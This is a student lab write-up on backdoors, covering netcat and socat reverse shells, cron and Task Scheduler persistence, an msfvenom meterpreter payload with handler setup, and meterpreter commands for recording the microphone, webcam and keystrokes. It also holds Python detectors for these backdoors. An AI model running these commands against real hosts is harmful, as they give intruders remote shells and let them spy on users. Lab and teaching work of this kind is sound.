20174315 Huang Huajian, Network Countermeasures Technology, Exp2: Backdoor Principles and Practice

1. Experiment goals

1.1 Experiment requirements

  • Use nc to build backdoor connections between Windows, macOS and Linux
  • Use meterpreter
  • Use MSF post-exploitation (POST) modules

1.2 Experiment content

  1. Use netcat to obtain a shell on the host, started by cron.
  2. Use socat to obtain a shell on the host, started by a scheduled task.
  3. Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, and run it to obtain the host's shell.
  4. Use MSF meterpreter (or other software) to generate a backdoor that obtains audio, camera images, keystrokes and so on from the target host, and try privilege escalation.
  5. Use MSF to generate shellcode, inject it into the pwn1 from Exp1, and obtain a reverse-connection shell.

3. Experimental procedure and results

2.1 ncat

netcat is a low-level tool for basic TCP and UDP sending and receiving. It is usually combined with other tools and can serve as a backdoor. Linux usually ships with netcat; run "man netcat" or "man nc" to read its usage instructions.

To install ncat on Windows, download ncat.rar from the attachment on the course home page and extract it. Here it must be extracted to the D drive.

2.1.1 Win gets Linux Shell

First check the Windows client's IP address (ipconfig).

After downloading netcat on Windows, switch to its directory and open a listener with the command ncat.exe -l -p 4315.

Next, open Kali and connect back with the command nc 192.168.1.49 4315 -e /bin/sh.

A little later, with the listener opened in Windows using ncat.exe -l -p 4320, Windows can be seen to have received the Linux shell, and any command can be run (here I use ls as an example).

2.1.2 Linux gets Win Shell

Now that Windows can get the Linux shell, the converse is of course also possible.

First we need the IP address of the virtual machine; here ipconfig is used to check it.

Then run the listening command nc -l -p 4315 on Linux, and connect back from Windows with ncat.exe -e cmd.exe 192.168.54.128 4315.

As a result, Linux has obtained the Windows shell.

The command-line interface can be seen and Windows commands can be executed (I use ipconfig as an example).

2.1.3 nc data transmission

Windows runs the listener command;

Linux establishes a connection to Windows;

After the connection is established, text data can be transferred.

2.2 Meterpreter

Meterpreter is a platform for generating backdoors. It has powerful features, especially its SOCKS proxy, which makes it a first-rate tool for internal-network penetration testing.

It is a backdoor program.

The traditional understanding is: someone writes a backdoor, and we make use of it.

Later, some experts wanted to write a platform that generates backdoors. Such a platform turns the backdoor's basic functions, extensions, encoding, target platform and runtime parameters into components or adjustable parameters; combining them as needed generates an executable file.

Typical platforms include:

  • intersect
  • msfvenom in Metasploit
  • Veil-evasion

Task One: Use netcat to obtain a shell on the host, started by cron

Cron is the scheduled-task service under Linux. It wakes up every minute and executes the preset commands according to its configuration file.

1. Open a listener in Windows, monitoring port 4315 with the command ncat.exe -l 4315.

2. Add a scheduled task with the crontab command; "-e" means edit. Select 3 as the editor, then insert 10 * * * * /bin/netcat 192.168.1.156 4315 -e /bin/sh in the last row, i.e. connect back to port 4315 of the host at the 10th minute of every hour.

3. Save and exit, and the configuration takes effect. Check it with "crontab -l"; "-l" means list. After the command executes at the 10th minute, the shell can be seen to have been obtained.

Task Two: Use socat to obtain a shell on the host, started by a scheduled task

1. Classmate Zhang Bo sent me the socat archive; download and extract it.

2. In Windows, open Control Panel -> System and Security -> Administrative Tools, find Task Scheduler and click Create Task.

3. Click the Triggers tab, select New, and set the task to begin when the workstation is locked.

4. In the Actions tab, click New, select the socat.exe file in the "Program or script" path, and fill in tcp-listen:4315 exec:cmd.exe,pty,stderr as the arguments. This command binds cmd.exe to port 4315 and redirects cmd.exe's stderr to stdout;

5. Once created, press Windows + L to lock the computer and log on again so that the task starts. Click Task Scheduler Library; I can see the program named 4315 is running.

6. Then enter socat - tcp:192.168.1.156:4320 in Kali. The cmd shell can be seen to have been obtained, and the command-line interface appears (ipconfig is used to verify it).
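A defender-side check for the two persistence mechanisms set up in Task One (the crontab line) and Task Two (the socat scheduled task). This is an added example, not code from the report; it assumes user-crontab syntax (five time fields plus a command) and a task exported from Task Scheduler as XML with the standard task namespace, and the sample inputs are constructed from the commands given in those two tasks.

```python
import re
import xml.etree.ElementTree as ET
# Command-line shapes a netcat/socat shell backdoor leaves behind: a shell handed to
# netcat's -e, a shell bound to a listening port by socat, or a shell run via socat's exec:.
SUSPICIOUS = [
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+\S*(sh|cmd)", re.I), "netcat -e spawning a shell"),
    (re.compile(r"socat\b.*tcp[46]?-listen:\d+.*exec:\S*(sh|cmd)", re.I), "socat binding a shell to a port"),
    (re.compile(r"socat\b.*exec:\S*(sh|cmd)", re.I), "socat executing a shell"),
]
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"  # Task Scheduler XML namespace

def suspicious_command(cmdline):
    """Return a short reason if the command line looks like a shell backdoor, else None."""
    for pattern, reason in SUSPICIOUS:
        if pattern.search(cmdline):
            return reason
    return None
def scan_crontab(text):
    """(schedule, command, reason) for user-crontab lines that match; '#' and '@...' lines are skipped."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        parts = line.split(None, 5)          # five time fields, then the command
        if not line or line[0] in "#@" or len(parts) < 6:
            continue
        reason = suspicious_command(parts[5])
        if reason:
            findings.append((" ".join(parts[:5]), parts[5], reason))
    return findings
def scan_task_xml(xml_text):
    """(command, arguments, reason) for Exec actions in an exported task XML that match."""
    findings = []
    for exec_node in ET.fromstring(xml_text).iter(TASK_NS + "Exec"):
        command = exec_node.findtext(TASK_NS + "Command", default="")
        args = exec_node.findtext(TASK_NS + "Arguments", default="")
        reason = suspicious_command(command + " " + args)
        if reason:
            findings.append((command, args, reason))
    return findings

# Constructed samples: a benign cron job, the cron line from Task One, and the socat task from Task Two.
SAMPLE_CRONTAB = """# nightly backup
0 2 * * * /usr/bin/rsync -a /home /backup
10 * * * * /bin/netcat 192.168.1.156 4315 -e /bin/sh
"""
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><SessionStateChangeTrigger><StateChange>SessionLock</StateChange></SessionStateChangeTrigger></Triggers>
  <Actions><Exec><Command>D:\\socat\\socat.exe</Command>
    <Arguments>tcp-listen:4315 exec:cmd.exe,pty,stderr</Arguments></Exec></Actions>
</Task>"""
```

On a real host, feed scan_crontab the output of crontab -l (per user) and scan_task_xml the XML produced by Task Scheduler's Export action; /etc/crontab has an extra user field and would need the split adjusted.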

Task Three: Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, and run it to obtain the host's shell

1. Generate 4320_backdoor.exe and copy it to Windows.

Enter the following command in Kali (since the backdoor is generated in Linux, the IP address here is Kali's IP address):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4315 -f exe > 4315_backdoor.exe

2. Run ncat.exe -l 4315 > 4315_backdoor.exe in Windows, putting the target host into file-receiving mode.

3. Run nc 192.168.1.49 4315 < 4315_backdoor.exe in Kali to transfer the generated backdoor to the host.

4. Open the MSF listening process.

Open another terminal in Kali and enter msfconsole to enter the msf console.

Enter in turn:

  • use exploit/multi/handler // use the handler module and set the payload

  • set payload windows/meterpreter/reverse_tcp // the same payload used when generating the backdoor

  • set LHOST 192.168.171.128

  • set LPORT 4320

  • exploit // setup complete, start listening

Task Four: Use MSF meterpreter (or other software) to generate a backdoor that obtains audio, camera images, keystrokes and so on from the target host, and try privilege escalation

1. Audio

Keeping the session from Task Three, entering record_mic captures audio input.

2. Camera

Enter the command webcam_snap to take a picture with the camera.

3. Keystroke recording

Use the keyscan_start command to start recording keystrokes, and the keyscan_dump command to fetch the recorded keystrokes.

3. Experiment thoughts and experience

3.1 Basic questions answered

(1) What possible ways can you think of for a backdoor to get into your system?

Software bundled with websites you visit, or software downloaded from unofficial download sites.

(2) What ways of starting up a backdoor do you know of (Windows and Linux)?

Windows: run at startup. Linux: inject shellcode.

(3) Which Meterpreter functions left a deep impression on you?

Through the reverse connection, you obtain a shell with all the privileges of the host running the executable that contains the backdoor, and can then obtain the user's password, upload and download files to the remote host, run cmd.exe, capture the screen, gain remote control, capture keystrokes and much more.

(4) How can you find out whether a backdoor has been installed on your own system?

Check the startup items and whether there are suspicious programs in Task Scheduler; install specialised anti-virus software with real-time protection; examine local ports to determine whether there are abnormal open ports; and so on.
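For the "abnormal open ports" part of answer (4), an added example (not part of the report) that audits listening sockets from ss -ltnp output on Linux: it flags any listener owned by nc/ncat/netcat/socat, like the port-4315 listeners used throughout this experiment, and any listener not on a small allow-list of expected services. The allow-list and the ss output are constructed assumptions.

```python
import re

# Constructed sample of `ss -ltnp` output on Linux: the header, two expected
# services, and a port-4315 listener opened by netcat as in this report's tasks.
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    127.0.0.1:631       0.0.0.0:*         users:(("cupsd",pid=903,fd=7))
LISTEN 0      1      0.0.0.0:4315        0.0.0.0:*         users:(("nc",pid=2241,fd=3))
"""
# Assumed allow-list of expected listeners on this host: port -> owning process name.
EXPECTED_LISTENERS = {22: "sshd", 631: "cupsd"}
# Generic network tools that should not be found holding a listening socket on a workstation.
SHELL_TOOLS = {"nc", "ncat", "netcat", "socat"}

LINE_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+'      # state, queues, local addr:port, peer
    r'(?:\s+users:\(\("([^"]+)",pid=(\d+))?'        # optional owning process and pid
)

def parse_listeners(ss_output):
    """Parse `ss -ltnp` lines into dicts with addr, port, proc and pid (proc/pid may be None)."""
    listeners = []
    for line in ss_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                                 # header or non-LISTEN line
        addr, port, proc, pid = m.groups()
        listeners.append({"addr": addr, "port": int(port), "proc": proc,
                          "pid": int(pid) if pid else None})
    return listeners

def audit_listeners(ss_output, expected=EXPECTED_LISTENERS):
    """Return (port, proc, reason) for listeners that a backdoor check should raise."""
    alerts = []
    for sock in parse_listeners(ss_output):
        if sock["proc"] in SHELL_TOOLS:
            alerts.append((sock["port"], sock["proc"], "network tool holding a listening socket"))
        elif expected.get(sock["port"]) != sock["proc"]:
            alerts.append((sock["port"], sock["proc"], "listener not on the allow-list"))
    return alerts
```

Run it against the live output of ss -ltnp (root is needed for the process column); on Windows the equivalent data comes from netstat -ano, whose column layout needs its own regex.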

3.2 Experimental experience

This was a very interesting experiment. By studying the teacher's tutorials and the blogs of senior students, I was basically able to complete it. In this experiment I learned the basic principles of backdoor attacks on hosts, and learned how to use netcat, socat, meterpreter and so on. Although the content is simple, I now have a basic understanding of backdoors. In future study I will go further into the various theoretical aspects of backdoors.

This experiment gave me a better understanding of some means of network attack and enhanced my network security awareness.

3.3 Problems encountered

Problem 1: Kali has no network connection

After starting Kali, I found for some reason that it had no Internet access. Through discussion with classmates I got a solution: under their guidance I restored the default settings through the Virtual Network Editor at the start of the experiment, and after restarting Kali it connected to the Internet successfully.

Problem 2: Running multiple programs led to failure

Solution: the easiest way is to redo it (see the .JPG).

Problem 3: Kali does not have socat installed

I could not get shared folders to work, and the situations I found online did not match my own.

Final solution: I put the socat archive into my mailbox, then logged in to Sohu mail in Kali's browser and downloaded it (a crude workaround; see the .jpg).

Source: www.cnblogs.com/hhj20174315/p/12544448.html